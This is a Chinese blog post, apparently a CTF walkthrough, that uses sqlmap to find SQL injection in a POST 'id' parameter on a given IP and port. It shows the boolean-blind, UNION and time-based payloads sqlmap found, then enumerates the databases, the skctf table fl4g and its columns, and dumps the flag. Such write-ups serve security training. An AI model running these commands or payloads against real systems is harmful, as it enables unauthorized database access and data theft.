SQLmap 爆破

本文详细介绍了如何使用SQLmap进行数据库爆破,包括确认注入点、识别数据库类型、列举数据库、表及列,并最终提取数据。通过示例展示了针对MySQL数据库的SQL注入攻击步骤,揭示了SQLmap在安全测试中的应用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、Sqlmap  -u "http://114.67.246.176:11055/index.php?" --data="id=1"   (这里  --data=“id=1” 是自己提交的post数据)

 2、输出数据库类型

POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: POST
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7574=7574 AND 'SIlI'='SIlI
    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: id=1' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a7868723a,0x707871544f7373644575,0x3a75736a3a), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'kCqI'='kCqI
---
[14:28:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11

说明可以爆破

继续。。。。

2、查看所有的数据库

 Sqlmap  -u "http://114.67.246.176:11055/index.php?" --data="id=1" --dbs

3、 猜测 flag 可能在skctf 中,所以选择整个数据库,查看里面的表名

 Sqlmap  -u "http://114.67.246.176:11055/index.php?" --data="id=1" -D skctf --table

 4、继续查看表中的列名

Sqlmap  -u "http://114.67.246.176:11055/index.php?" --data="id=1" -D skctf -T  fl4g --columns

 5、转存数据表列中的字符串信息

Sqlmap  -u "http://114.67.246.176:11055/index.php?" --data="id=1" -D skctf -T  fl4g --columns --dump

 这样我们就拿到了 flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明月嫣然-疏桐-暖阳

你的鼓励是我开源的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值